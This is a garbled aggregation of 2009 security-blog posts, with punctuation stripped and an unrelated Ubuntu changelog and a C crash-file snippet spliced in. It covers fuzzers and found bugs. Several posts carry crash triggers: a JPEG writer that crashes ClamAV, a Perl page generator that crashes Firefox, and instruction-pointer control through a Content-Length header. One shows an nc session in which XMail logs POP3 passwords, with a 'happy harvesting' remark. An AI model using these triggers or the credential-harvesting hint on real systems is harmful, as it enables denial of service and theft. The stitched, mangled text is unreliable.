ubuntu cat clamc const char crashstr xff xd8 jpg marker xff xed exif data x00 x02 length Photoshop 30 x00 8BIM x04 x0c thumbnail id x00 x01 x01 x01 x01 x01 0123456789012345678912345678 skip over 28 bytes include include include define NR_ITER 200000 int main FILE fp int i fp fopen clamav-jpeg-crashjpg , w if fp printf can't open create file n exit 0 for i 0 i 21 1075-0ubuntu6 for clamav-daemon and clamav-freshclam - add debian usrbinfreshclam and debian usrsbinclamd - debian clamav- daemonfreshclam dirs add etc apparmord force-complain - debian clamav- daemonfreshclam install install profiles - debian clamav- daemonfreshclam preinst create symlink for force-complain on pre-feisty upgrades, upgrades where apparmor-profiles profile is unchanged ie non-enforcing and upgrades where the profile doesn't exist - debian clamav- daemonfreshclam postrm remove symlink in force-complain on purge - debian clamav- daemonfreshclam postinstin reload apparmor - update READMEDebian with note on Apparmor Update apparmor profile for clamd to work with TCP sockets LP 288942 -- Scott Kitterman Wed, 12 Nov 2008 15 20 49 -0500 IMAGE http://www.secuobs.com/revue/news/122405.shtmlhttp://www.secuobs.com/revue/news/122405.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - You know, I have a lot of respect of developers They write code, however the quality may be, and they help us out more than we know But too often they put themselves into funny situations when discussing security bugs Its like they can't believe the experts Regarding the latest CUPS integer overflow information http wwwcupsorg strphp L2974 iljavs Ilja Van Sprundel in _cupsImageReadPNG the following calculation is made bufsize img-xsize img-ysize 3 if bufsize img-ysize 3 img-xsize fprintf stderr, DEBUG PNG image dimensions pourcentsuxpourcentsu too large n , unsigned width, unsigned height fclose fp return 1 there is a potential integer overflow in the validation code that could render the whole validation useless img-ysize 3 on itself could overflow mike Developer The maximum dimensions of an image are 2 27-1, so it is impossible for img-ysize 3 to overflow a 32-bit integer See the range checks prior to the buffer size check One day later mike Developer Reopening since IMAGE_MAX_HEIGHT is 2 31-1, not 2 27-1 Patch attached that fixes it I thought that was very interesting myself No disrespect to the CUPS team or any developer out there, but please believe us security researchers its what we do You write code, and even if you happen to write sub-par code, we sometimes help you fix it and complain every once in a while, I know If we are nice enough to help you out with a security bug, let it be big or small, please polish it with some consideration and or respect Also, I thought I'd throw this in this blog post Besides the fact that you need restarts and shutdowns to modify or complete certain maintenance of a computer, shouldn't it be secondary to the default task of powering down our workstations I find hibernation much more efficient and much quicker You don't even need to power the pc for hiberation, it powers down just like shutdown but boots up twice as fast Just something to think about until those guys from ASUS get the hyper booting technology out of testing, haha In other news, I've starting writing for SecuriTeam Blogs, which is pretty cool so far No worries though, I'll still be writing for this site, and regardless of finals oh boy , I've still been working on projects and I have a special one to release soon Stay tuned Ladies and Gentlemen, everything is going to be great IMAGE http://www.secuobs.com/revue/news/122404.shtmlhttp://www.secuobs.com/revue/news/122404.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - 1 What exactly is JPEGfuzr JPEGfuzr is a perl implementation of fuzzing JPEG metadata through the Image MetaData JPEG extension It supports 40 metadata tags and fuzzes all, one by one, using the fuzz data supplied 2 Who may be interested in JPEGfuzr Security researchers, software vendors, programmers, curious eyes, or basically anyone that wants to research the JPEG file format or find bugs in JPEG implementations 3 How do I use JPEGfuzr You must first define a target A target application can most likely be anything that works with JPEG files and reads their metadata After defining a target, you just need a JPEG file that jpegfuzr can use and modify for fuzzing purposes, which I have included in test Simply set -s for sleep time in between fuzzing and, technically, your ready to go Usage jpegfuzrpl -t -z -s Example jpegfuzrpl -t usr bin iview -z testjpeg -s 2 You can also use killsh to kill off processes that jpegfuzr doesn't JPEGfuzr also uses 2nd generation fuzz strings like in rshatter and vncrush Demo Screenshots You can grab a copy yourself HERE or any other the above links via the keyword 'jpegfuzr' Its time to go out and find your own 0days Make it, work it, own it Have fun IMAGE http://www.secuobs.com/revue/news/122403.shtmlhttp://www.secuobs.com/revue/news/122403.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - Well its the time of the year again-- the holidays are upon us A well deserved break from college has gave me plenty of time to work on personal and work related research as well While making good friends with night and usually sleeping in days, I've got much work done on some projects that I feel like will bring good results Memory leaks and other bugs have been bridged and battered which, has lead me to believe, there are problems not just in big or small name applications, but often libraries they use As you should know, there can be a lot of possibilities from vulnerabilities in a library In most cases, if an application uses a vulnerable function in a vulnerable library, the bug can be triggered in the application Unless there are other circumstances or prevention methods THIS IS GOLDEN That being said, an interesting situation I found myself in when fuzzing an application that uses glib glade, pango, etc , that I also happened to contain many bugs including integer overflows, one at least having the possibility to corrupt memory in escalation to a heap overflow, took at turn at showing me some potential of creating denial of service conditions Having the application process certain types of data, even in no particular parsing form, broke the application GLib-ERROR build buildd glib20-2182 glib gmemc 175 failed to allocate 2684354560 bytes aborting Program received signal SIGABRT, Aborted Switching to Thread 0xb6d00720 LWP 19767 0xb7fd6430 in __kernel_vsyscall gdb bt 0 0xb7fd6430 in __kernel_vsyscall 1 0xb73a9880 in raise from lib tls i686 cmov libcso6 2 0xb73ab248 in abort from lib tls i686 cmov libcso6 3 0xb756d90c in g_logv from usr lib libglib-20so0 4 0xb756d946 in g_log from usr lib libglib-20so0 5 0xb756bca6 in g_realloc from usr lib libglib-20so0 6 0xb77095a9 in pango_glyph_string_set_size from usr lib libpango-10so0 7 0xb6b2be3e in from usr lib pango 160 modules pango-basic-fcso 8 0xb770ffba in from usr lib libpango-10so0 9 0xb77232fa in pango_shape from usr lib libpango-10so0 10 0xb7714e82 in from usr lib libpango-10so0 11 0xb7715891 in from usr lib libpango-10so0 12 0xb77175fc in from usr lib libpango-10so0 13 0xb771879b in from usr lib libpango-10so0 14 0xb771a3ee in pango_layout_get_pixel_extents from usr lib libpango-10so0 15 0xb771a45a in pango_layout_get_pixel_size from usr lib libpango-10so0 16 0x08086eac in nsfont_width 17 0x080a77bc in 18 0x080a747d in 19 0x080a747d in 20 0x080ab3f0 in layout_document 21 0x0809f073 in html_reformat 22 0x080a0d95 in html_convert 23 0x0805980c in content_convert 24 0x0805cc49 in 25 0x0805a6c1 in fetch_send_callback 26 0x08060c23 in 27 0x0806110f in 28 0x0805afe9 in fetch_poll 29 0x08088276 in gui_poll 30 0x0807fe94 in main Looking at some the glib error message and some source code and playing with it even more , it is throwing errors from g_malloc and g_realloc Is glib as solid as everyone has hoped No sir I also firefox has some memory issues During the beginning stages of testing, I noticed it crashed several times just by getting it to eat some pages that made it process huge amounts of data I will now release one of the more _reliable_ bugs Play with it on XP, r0ut3r confirmed works ok on vista though usr bin perl filename ARGV 0 if defined filename print Usage 0 n n head n n trig locationhash A x 20000000 n foot n data head trig foot open FILE, '' filename print FILE data close FILE exit Also here locationhash is actually fun to play with A mozilla crash reporter is more likely to show up if your already running applications that use a lot of memory, or you notice your firefox is frozen and start clicking around But if you like play with the trigger and you might irritate the average browser both kinds of them even more Who knows, maybe 'Improved Memory Management' will make it on the release notes of 31 Also something important to note is that all these browser's related Firefox Mozilla, Flock, IceCat, Madfox, Pogo, Seamonkey, Songbird don't just share the good but, according to the situation, the bad, too The bugs cannot hide anymore IMAGE http://www.secuobs.com/revue/news/122402.shtmlhttp://www.secuobs.com/revue/news/122402.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - As the 2008 ends and 2009 begins, I hope everyone will have a fun and safe holiday celebration 2008, for a lot of people, certainly could have been better, but we all should have confidence that 2009 will bring many better and great things I myself have research several goals and hope to continue my education and happy, healthy lifestyle I was activex fuzzing on random computers again haha and got a funny crash on wscript on vista while fuzzing Microsoft Money 2006 This is not the first time fuzzing has made wscriptexe have 'errors' C Program Files Microsoft Money 2006 MNYCoreFiles prtstb06dll Setting 'Startup' to 0 seems to pull the trigger ACCESS VIOLATION MOV ECX, ESI 30 I was looking through the current exploits for the XML buffer overflow for Internet Explorer and some old skylined code and decided to code one that hits up a bindshell on Vista SP1 so I did The core concepts and exploitation techniques came from other available codes by skylined muts krafty, thanks goes to them My win32 smashing techniques are limited but always improving so sorry if the code is off or not up to par I have discovered a memory leak in Libxul Libxul provides an API for XUL apps Gecko embedders, and Gecko of course is the rendering engine of many mozilla products, including firefox, and also lots of other browsers The effects of triggering this bug may not be a crash or fault, but huge memory allocation It has, in my tests and others, consumed the target browser, rendering it unuseable Safari also hits an error with WebKit when processing fuzz data Codes for libxul and webkit are available now bf2 Browser Fuzzer 2 , the next generation development of my earlier work bf, Browser Fuzzer , has been quite busy Not all of the bugs it uncovers will be public or discussed here, but many will Browser Fuzzer 2 has been completely redesigned and rewritten to cover huge bases It fuzzes CSS, DOM, HTML, and JavaScript It has been a product of many hours of R D and strong motivation It has ripped through nearly every browser available I am undecided as to when it will be released, if I release it at all IMAGE http://www.secuobs.com/revue/news/122401.shtmlhttp://www.secuobs.com/revue/news/122401.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - As you might have noticed, there has been some changes to JBrownSEC lately I want to thank Stashbox for hosting our files which are available through the right side bar along with other news and information feeds I hope these new additions and other slight changes benefit all our the readers out there I know I sure like them I have also released some exploits recently including some memory leaks in Konqueror and a remote code execution for 3com's old tftp server, for fun You also might have to play with the data amount on the 'link href' leak on Konqueror to make it less likely to recover, if at all Netsurf also has some integer overflows and memory leaks in its rendering engine and such, the advisory and exploits are available now Check your favorite security site and or the right side info panel A while back I discovered a xss-turned-cmd execution exploit utilizing Wscript, so not very reliable for Novell Netware's Remote Manager Sometime thereafter I recieved an email from someone at Novell asking to work with me concerning this flaw I would have helped more than I did, but at the time of my email my Netware server was down or something happened so I wasn't very helpful Long email short, the person asking for information about the bug claimed that they could not reproduce it and, I suppose, dismissed it I think they were using Netware 65 SP7 and the bug was tested on my 65 SP6 server But the bug is real You can actually inject code for some session-wide action in the target browser I was also fuzzing a version of ICEbrowser, the browser that Novell uses for Remote Manager and web surfing in general and found that I could trigger a fault and actually reboot the system Note that this exploit is not completely reliable, it has shown signs of being fatal to the health of the server if continually faulted and rebooted over and over again Abend 1 on P00 Server-57006 Page Fault Processor Exception Error code 00000000 Registers CS 0008 DS 0010 ES 0010 FS 0010 GS 007B SS 0010 EAX 00000000 EBX 9687EF4C ECX 004EB8F0 EDX 000000E4 ESI 00000000 EDI 00000001 EBP 8D9E7F3C ESP 86179EF4 EIP 00000000 FLAGS 00010086 Access Location 0x00000000 Running process Interrupt service routine nested count 2 Interrupted process Server 12 Process Thread Owned by NLM SERVERNLM Stack pointer 86179F60 OS Stack limit 86172020 CPU 0 Thread 89D24220 is in a NO SLEEP state Scheduling priority 67371008 Wait state 50500F0 Waiting for work Stack 002048F1 SERVERNLMPerformCallOuts 105 --00000000 LOADERNLMKernelAddressSpace 0 --000022B6 LOADERNLMKernelAddressSpace 22B6 00214018 SERVERNLMWorkerThread 344 --39252B31 --86179F6C 00227F55 SERVERNLMSchedTimerISR 85 --00000000 LOADERNLMKernelAddressSpace 0 --00000001 LOADERNLMKernelAddressSpace 1 --00000000 LOADERNLMKernelAddressSpace 0 -001337F0 LOADERNLMinterruptVectorPool 0 -0013C570 LOADERNLMkVirtualInterruptTable0 0 --00000010 LOADERNLMKernelAddressSpace 10 0010818B LOADERNLMkTimer1Interrupt 1D 001077E9 LOADERNLMkProcessProtectedModeInterrupt 39 --00000000 LOADERNLMKernelAddressSpace 0 -0013C570 LOADERNLMkVirtualInterruptTable0 0 --00000000 LOADERNLMKernelAddressSpace 0 --392529C6 00107147 LOADERNLMkProtectedModeInterruptContinue 5F --00000010 LOADERNLMKernelAddressSpace 10 --00000010 LOADERNLMKernelAddressSpace 10 --00000010 LOADERNLMKernelAddressSpace 10 --00000000 LOADERNLMKernelAddressSpace 0 --00000000 LOADERNLMKernelAddressSpace 0 --00000000 LOADERNLMKernelAddressSpace 0 --FFA1276D --00000000 LOADERNLMKernelAddressSpace 0 --839FE2A0 IDEATAHAMIfYouSeeThisYoureWayPastTheIDEDriver 3BA0 --FDE3AF4A 00214018 SERVERNLMWorkerThread 344 --00000008 LOADERNLMKernelAddressSpace 8 --00000246 LOADERNLMKernelAddressSpace 246 --00000000 LOADERNLMKernelAddressSpace 0 --89D24220 JVMNLM__fprem1_chk 1486 --00000000 LOADERNLMKernelAddressSpace 0 --89D24220 JVMNLM__fprem1_chk 1486 00221158 SERVERNLMTcoNewSystemThreadEntryPoint 40 --89D24220 JVMNLM__fprem1_chk 1486 --00000000 LOADERNLMKernelAddressSpace 0 --00000000 LOADERNLMKernelAddressSpace 0 --00000000 LOADERNLMKernelAddressSpace 0 --00000000 LOADERNLMKernelAddressSpace 0 --00007F80 LOADERNLMKernelAddressSpace 7F80 --00000000 LOADERNLMKernelAddressSpace 0 --8616904C 003682FE SERVERNLMSwitchStacksAndCall 44 --FE00B0A0 LOADERNLMOSAllocMemory B0A0 --8616FF48 --00002088 LOADERNLMKernelAddressSpace 2088 --34343434 --65657246 --65657246 --65657246 --65657246 --65657246 --65657246 --65657246 --34343434 --65657246 --65657246 --65657246 --65657246 --65657246 --65657246 --65657246 --65657246 Stack dump exceeded the valid memory limit Additional Information The hardware detected a problem while executing an interrupt service routine The code being executed is owned by SERVERNLM It may be the source of the problem or there may have been a memory corruption Memory at EAX Invalid dump address Memory at EBX 9687EF4C 00000000 00000000-00000000 00000000 9687EF5C 00000000 00000000-00000000 464C4143 FLAC 9687EF6C 00000000 00000000-00000000 00000000 9687EF7C 00000000 00000000-00000000 00000000 9687EF8C 00000000 000003E8-85E53B00 000003E8 h e h 9687EF9C 00000000 00000246-00000003 856E6F0D F no 9687EFAC FE2756A0 000003E8-C188BFC0 00000000 'V h A 9687EFBC 00000000 000003E8-00000002 00000246 h F 9687EFCC 8C027090 00000000-0000000C FE2756A0 p 'V 9687EFDC 00000000 00000000-8B377420 00000003 7t 9687EFEC 855EC6C0 00000246-00000000 00000002 F F 9687EFFC 8B377508 00000008-00000000 0000002F 7u 9687F00C C188BFC0 00000000-856F2E28 0000002F A o 9687F01C C188BFC0 00000000-00000000 C188CFC8 A AOH 9687F02C 9687F030 00261EE6-00000000 00000008 p0 f 9687F03C 00000000 00000000-856FBB8D 0000002F o Memory at ECX 004EB8F0 00000000 00000000-00000000 00000000 004EB900 DA381B1E 00000658-FE00AD00 00000000 Z8 X - 004EB910 00000000 00000000-00000000 00000000 004EB920 00000000 00000000-00000000 EC51D54E lQUN 004EB930 00000000 00000000-00000000 00000000 004EB940 00000000 00000000-00000000 FE001900 004EB950 00000008 FE001B9C-942A64DC 00000124 d 004EB960 01031618 00000000-00000000 00000000 004EB970 00000000 00000000-FE0AD980 99D29EC0 Y R 004EB980 00001018 01031618-00000000 00000000 004EB990 00000000 00000000-00000000 FE004084 004EB9A0 9A09A744 00004A1B-01031618 00000000 'D J 004EB9B0 00000000 00000000-00000000 00000000 004EB9C0 004EB9BC 8DFA1978-99A392BC 002091D0 N97X Y 8D9E7FDC 9619C180 00000000-00221158 9619C180 A X A 8D9E7FEC 8C295900 00000000-00000000 00000000 Y 8D9E7FFC 34343434 - 4444 Pointer exceeds valid memory limit Memory at ESP 86179EF4 002048F1 00000000-000022B6 00214018 Hq 6 86179F04 39252B31 86179F6C-00227F55 00000000 9pourcents 1 l U 86179F14 00000001 00000000-001337F0 0013C570 7p Ep 86179F24 00000010 0010818B-001077E9 00000000 wi 86179F34 0013C570 00000000-392529C6 00107147 Ep 9pourcents F qG 86179F44 00000010 00000010-00000010 00000000 86179F54 00000000 00000000-FFA1276D 00000000 'm 86179F64 839FE2A0 FDE3AF4A-00214018 00000008 b c J 86179F74 00000246 00000000-89D24220 00000000 F RB 86179F84 89D24220 00221158-89D24220 00000000 RB X RB 86179F94 00000000 00000000-00000000 00007F80 86179FA4 00000000 8616904C-003682FE FE00B0A0 L 6 0 86179FB4 8616FF48 00002088-34343434 65657246 H 4444 eerF 86179FC4 65657246 65657246-65657246 65657246 eerF eerF eerF eerF 86179FD4 65657246 65657246-34343434 65657246 eerF eerF 4444 eerF 86179FE4 65657246 65657246-65657246 65657246 eerF eerF eerF eerF Stack Walk Current EIP 00000000 Stack Contents EIP invalid I have decided to release bf2, but no release date has been set yet I am now and will be open for suggestions after Browser Fuzzer 2 is released, to take into consideration for bf3, which I plan to begin working on in the near future Bug on IMAGE http://www.secuobs.com/revue/news/122400.shtmlhttp://www.secuobs.com/revue/news/122400.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - One good thing is that I am a multitasker, because often I tend to juggle multiple things, many, many things infact, in my life all at once and still keep sane Yay for me School is starting back and the pre-test for a This could be painful class titled Computer Literacy is a joke Of 130 questions, around 50 were how to do this and that in sometimes vague format but many details on microsoft office products A lot of the rest were an unusual form of redundancy, and quite honestly, I don't see Bill Gates breezing through this pre-exam At least I should have gotten all the networking and How to click on an icon -like questions correct I guess I'll be taking advantage of the full course this semester and learn stuff ARG Oh well, my other classes seem alright though I'll have some fun I'm sure Browser Fuzzer 2 was recently released I will be releasing some things under Krakow Labs now, so you may want to check there every once in a while or look for new releases on the security sites By the way, what is up with people turning in DoS vulns as full blown buffer overflow exploits its slightly confusing when I'm seeing them come in and my eyes light up just to be let down when theres literally no possibility of useful code getting executed Its not too bad when there is at least a possibility of code execution, but when you have no control of the registers and you paste output that clearly shows you haven't got a clue thats I'm going to do another Wow , ok Alright, that should do it much better now On another note, Xmail on debian sarge etch logs POP3 usernames and passwords in readable and writeable logs The versions they both use don't even support the 'fix' for the 'feature', so happy harvesting Ubuntu's latest version has only username logging enabled by default I believe they implemented this 'feature' the one that defines password logging or not HMMM in 125 or something bugs debian nc localhost 110 OK XMail 121 POP3 Server service ready Sun, 18 Jan 2009 01 59 32 -0500 USER boxer OK Password required for boxer localhost PASS superman OK Maildrop has 0 messages 0 bytes LIST OK 0 0 QUIT OK XMail 121 POP3 Server closing session bugs debian grep boxer var log xmail pop tail -1 localhostlocaldomain localhost 127001 2009-01-18 01 59 37 boxer superman bugs debian Note superman really isn't my password, lol Above is the example on sarge, tested on Etch too Here is some interesting uri stuff to play with on IE res ieframedll previewdlg res ieframedll dnserrorhtm res ieframedll 24 123 res ieframedll MUI 1 res ieframedll TYPELIB 1 res ieframedll UIFILE 20481,20482,20483,20484,20484,20485,20486,20487,39216,41555 res ieframedll WEVT_TEMPLATE 1 res ieframedll Version Info 1 res ieframedll 23 ABOUTjs res ieframedll 23 ANALYZEjs res ieframedll 23 ANCHBRWSjs res ieframedll 23 DOCBROWSjs res ieframedll 23 ERRORjs res ieframedll 23 HTTPERRORPAGESSCRIPTSjs res ieframedll 23 IEERRORjs res ieframedll 23 IMGBROWSjs res ieframedll 23 INVALIDCERTjs res ieframedll 23 ORGFAVjs res ieframedll 23 PHISHSITEjs res ieframedll 23 POLICYjs res ieframedll 23 PREVIEWjs res ieframedll previewdlg dialog res ieframedll 23 PSTEMPLATESjs res ieframedll 24 123 XML file Some I got myself but most I found here a while back when I was researching IE Thanks to that guy for most of them Research continues, the show must go on I am in a deep development mind set right now and my fingers won't let me stop typing HACKER GET WHAT HACKER WANT like that one commercial lol Get Unique IMAGE http://www.secuobs.com/revue/news/122399.shtmlhttp://www.secuobs.com/revue/news/122399.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - The state of the computer security industry has changed slowly, yet frequently, since its conception It is no longer easy to find vulnerabilities in products that are worth their exploit code I am not at all saying that hacking is a dieing profession, oh, hacking will be here until the end I am saying that things are different than how they used to be Penetration testing is actually a vibrant field, and it works when you have the right people Choosing the wrong people just costs you money Fuzzing has taken off like never before, with everybody and their grandmother studying protocols to get the latest code complete for testing It is all for the bugs Well, for some its for the money too, people do have to make a living Nobody wants to be just independent forever, family men and women have to support their families The mastery of the security arts helps and hurts, but usually they are never both thought of at the same time, or a world of confusion and ethical upbringing would become a flaming sword that is ready to divide their hearts Oh, pity the junkies who never give themselves a chance Better yet, lets give them an industry that sells fear to those junkies Why not the old profit power formula And power, unrestrained but accountable power, could make even the modest researcher's eyes twinkle like that stars in the sky Yet these questions rarely come up until networks and systems have been compromised As history shows, nothing will be done about a problem until an event occurs that provokes undeniable acknowledgement and remediation FUD isn't just in political affairs, its in every form of bureaucracy, even those forms which get downplayed or even conveniently forgotten It is ever so slightly poetic Oh, Industry IMAGE http://www.secuobs.com/revue/news/122398.shtmlhttp://www.secuobs.com/revue/news/122398.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - When anything is released, there is almost inevitably going to be people who don't like it or have malicious comments to make No matter how good or bad it is really it, people may even group together and form an anti-constructive criticism movement for their own benefit, fun, or simple pleasure Its not a big deal I release things because I want to, I think they are good and helpful, and I want to share my research with the world I have in the past released things In the past I have not released things Everyone has their own preference and ideas, and it is, in my own opinion, at least an attempt at counter production when people unkindly discuss projects Especially when people, usually when it occurs, often hide behind the keyboard to do it Caring what people think is so, so overrated Besides all of that, lots of time and hard work go into research, and often the people who have nothing to do with it are the ones who find it trivial to make unsavoury comments I am me, you are you I understand that some people's goals are always going to be trying directly or indirectly to damage things That's life I guess I will just keep being the nice guy I am and say they certainly make life interesting , and be myself as always I know there is a happy ending, somewhere And more woes from my computer literacy course If it only mattered for me to prove a point One may ponder on the thought that the these courses may need some adjustment IMAGE http://www.secuobs.com/revue/news/122397.shtmlhttp://www.secuobs.com/revue/news/122397.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I just wanted to share a hysterical message in a dialog box from Eudora when it hears the gushing data overflowing its buffers A buffer overflow has been detected in Eudora Great, but it seems like Eudora is better at detecting them than preventing them In rare cases a buffer overflow could be exploited to compromise the security of your computer if you allow Eudora to continue to run Really in rare cases, you say It is no wonder why running fzem against Eudora yielded some unsurprising results Warning Although quitting Eudora now will protect from buffer overflow exploits, any work you have in progress will not be saved and will be lost So if you save me from the buffer overflow exploit, the draft I was working on will be lost and I'll have to deal with it Fair enough but only if the protection scheme actually works And just take one more look at this Secret message irony Although quitting Eudora now will protect from buffer overflow exploits Quit Eudora now Sure Lemme go download Thunderbird right away Though Eudora has been discontinued for a while now, it is still useful for testing and quite fun to play around with IMAGE http://www.secuobs.com/revue/news/122396.shtmlhttp://www.secuobs.com/revue/news/122396.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - After looking over Powerfuzzer's website, I found a cool link to an actual fuzzing shirt, the first one of its kind that I've seen Check it out I figure for some readers it may be a good investment IMAGE http://www.secuobs.com/revue/news/122395.shtmlhttp://www.secuobs.com/revue/news/122395.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I've been playing with Novell's NCP and its interesting to say the least I will share a bit of research with you also note that ethereal wireshark's NCP dissector is decent and can help you out tons if you are interested in this protocol Packets reply packets usually look something like this sig x74 x4e x63 x50 reply signature - tNCP len x00 x00 x00 x10 length 16 srp x33 x33 type service reply 0x3333 seq x00 sequence number 0 cnm x19 connection number 25 tnm x01 xff task number 1 ccd x00 completion code 0 cst x00 connection status 0 Also, request packets use x44 x6d x64 x54 DmdT not tNCP Sniffing the Novell Client is kinda fun IMAGE http://www.secuobs.com/revue/news/122394.shtmlhttp://www.secuobs.com/revue/news/122394.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I was thinking about it and hadn't read it for a while, so I broke out the literature and just felt so comfortable It must be shared A great, GREAT read indeed Another one got caught today, it's all over the papers Teenager Arrested in Computer Crime Scandal , Hacker Arrested after Bank Tampering Damn kids They're all alike But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker Did you ever wonder what made him tick, what forces shaped him, what may have molded him I am a hacker, enter my world Mine is a world that begins with school I'm smarter than most of the other kids, this crap they teach us bores me Damn underachiever They're all alike I'm in junior high or high school I've listened to teachers explain for the fifteenth time how to reduce a fraction I understand it No, Ms Smith, I didn't show my work I did it in my head Damn kid Probably copied it They're all alike I made a discovery today I found a computer Wait a second, this is cool It does what I want it to If it makes a mistake, it's because I screwed it up Not because it doesn't like me Or feels threatened by me Or thinks I'm a smart ass Or doesn't like teaching and shouldn't be here Damn kid All he does is play games They're all alike And then it happened a door opened to a world rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought a board is found This is it this is where I belong I know everyone here even if I've never met them, never talked to them, may never hear from them again I know you all Damn kid Tying up the phone line again They're all alike You bet your ass we're all alike we've been spoon-fed baby food at school when we hungered for steak the bits of meat that you did let slip through were pre-chewed and tasteless We've been dominated by sadists, or ignored by the apathetic The few that had something to teach found us will- ing pupils, but those few are like drops of water in the desert This is our world now the world of the electron and the switch, the beauty of the baud We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals We explore and you call us criminals We seek after knowledge and you call us criminals We exist without skin color, without nationality, without religious bias and you call us criminals You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals Yes, I am a criminal My crime is that of curiosity My crime is that of judging people by what they say and think, not what they look like My crime is that of outsmarting you, something that you will never forgive me for I am a hacker, and this is my manifesto You may stop this individual, but you can't stop us all after all, we're all alike IMAGE http://www.secuobs.com/revue/news/122393.shtmlhttp://www.secuobs.com/revue/news/122393.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - Carpe Noctem translates into Seize the Night , showing descriptive abilities as the indirect or direct _motto_ of computer security people around the world for the young and old, alike I like to write and found myself writing this song one night enjoy Carpe Noctem V1 I traceroute my target and find it across the sea I've done this before, how hard can it be Discovering the services, my heart starts to race But the night starts to end, anyways I have to wait The next quest is getting around the IDS Encryption does well against the best I'll pull out my exploits to help along the way Carpe Noctem is all I have to say CHORUS Because your server, your clients, all are mine Even if I have to crack hashes for all of time I'll get what I want, and thats something you should factor I own boxes and networks and they call me a hacker V2 Its back to the race once I own their database Piggybacking ports always puts a smile on my face I own your box, mr admin, so I'll make myself an image I'll be sniffing your traffic and I'll decide when I'm finished My backdoor keeps me safe and I'm tunneling through plenty of hosts Got more keys to the gateways but I like the environment the most Modified some binaries with some different code Its time to go so I turn off the wifi and hit the road CHORUS Because your server, your clients, all are mine Even if I have to crack hashes for all of time I'll get what I want, and thats something you should factor I write exploits and spawn shells and they call me a hacker V3 Day 3 I'm back and I'm actually almost there 132 out of 150 hosts owned and 0days weren't spared Seems their devs wrote a custom file server Fuzzed it for hours and I found it insecure Borrowing the source code was fun itself Writing up an exploit proved good for my health Typing so fast so excited to finally hit a root shell A job well done, kept my access but covered my trail CHORUS Because your server, your clients, all are mine Even if I have to crack hashes for all of time I'll get what I want, and thats something you should factor I am one with the machine and they call me a hacker OUTRO No, norton will not protect you Yes, your logs lied again No, security doesn't exist Its our game, so of course we're going to win For the record, this writing is fictional IMAGE http://www.secuobs.com/revue/news/122392.shtmlhttp://www.secuobs.com/revue/news/122392.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I came across an interesting bug the a few days ago while testing my new HTTP client server fuzzer The target was a convenient HTTP server built for win32 and very useful for the software package The server runs, displays content, etc Basically, it is included incase you don't have or don't want to use another web server to display its core content Anyways, I was running Hzzp against it and got a Microsoft Visual C Runtime Error Oh yeah I looked at my terminal and saw it was fuzzing Content-Length with numbers Hzzp had sent a request with the HTTP header Content-Length being set to -1 I ran the software in the debugger and used to custom options to trigger the bug again The server stopped in olly, I hit continue That is when the EIP caught my attention it was 0xFFFFFFFF Hmmmmmmmmm, very interesting This certainly looked delicious, so I debugged further I soon figured out that I could dictate the instruction pointer directly through Content-Length, in decimal notation calc 0xabcddcba 2882395322 I send a request with Content-Length 2882395322 and EIP 0xabcddcba I took a look at the source, and the developer who wrote how Content-Length was interpreted seems more than happy to let clients control Content-Length quite deliberately It later gets banged up in memcpy and leads to us owning EIP Quite a useful memory corruption vulnerability IMAGE http://www.secuobs.com/revue/news/122391.shtmlhttp://www.secuobs.com/revue/news/122391.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I guess these days are different than those of which Pop-up blockers were still relevant Because of the built-in protection most major web browsers offer, the era of those beastly applications has declined, if not been forgotten Bug hunting in ActiveX controls has left the field nearly extinct for most software, but not all of course Not that I'm saying there aren't any more bugs out there, but there are far fewer than ever before An interesting issue not much in the way of security issue is in Realplayer's ierpplugdll The control associated with ierpplugdll FDC7A535-4070-4B92-A0EA-D9994BCC0DC5 contains a method called OpenURLInPlayerBrowser As you might have figured, we can open any URL in Realplayer using this function Now, not that any Pop-up blockers were designed to deal with this, because I doubt they were or they would have, but we can bypass them and get Realplayer to open URLs for us That means most websites that IE will open Realplayer basically uses IE , Realplayer can open as well Its as easy as activexOpenURLInPlayerBrowser url Nothing special, it just may come in handy sometime IMAGE http://www.secuobs.com/revue/news/122390.shtmlhttp://www.secuobs.com/revue/news/122390.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - A thousand words, indeed I also discovered something funny about PuTTY you could trick a local user into launching another executable if they choose to duplicate their session A scenario would go something like this ex puttyexe - Desktop Target launches PuTTY and opens a session Some time later an attacker manages to move to puttyexe somewhere off the Desktop while the session is open and replaces it with ANOTHER executable, named puttyexe Target comes back and decides they need a duplicate session Duplicate Session on the menu But instead of a duplicate session, the attacker's executable is launched, and we all know how that works Probably not very useful for much of anyone just something funny about how PuTTY's functionality I'm excited to announce the release of Hzzp for Monday, April 27th 2009 After countless hours of bug hunting, this valuable fuzzing tool has served it purpose well After a near rewrite and restruction of Hzzp, its ready for public release at Krakow Labs tomorrow Happy Fuzzing IMAGE http://www.secuobs.com/revue/news/122389.shtmlhttp://www.secuobs.com/revue/news/122389.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - After seeing this advisory for my favorite win32 newsgroup software, I had to check it out Before I had time to write a proper exploit, however, someone, as usual, had posted a low quality soon thereafter Right Well mine should win any race with the first near proof of 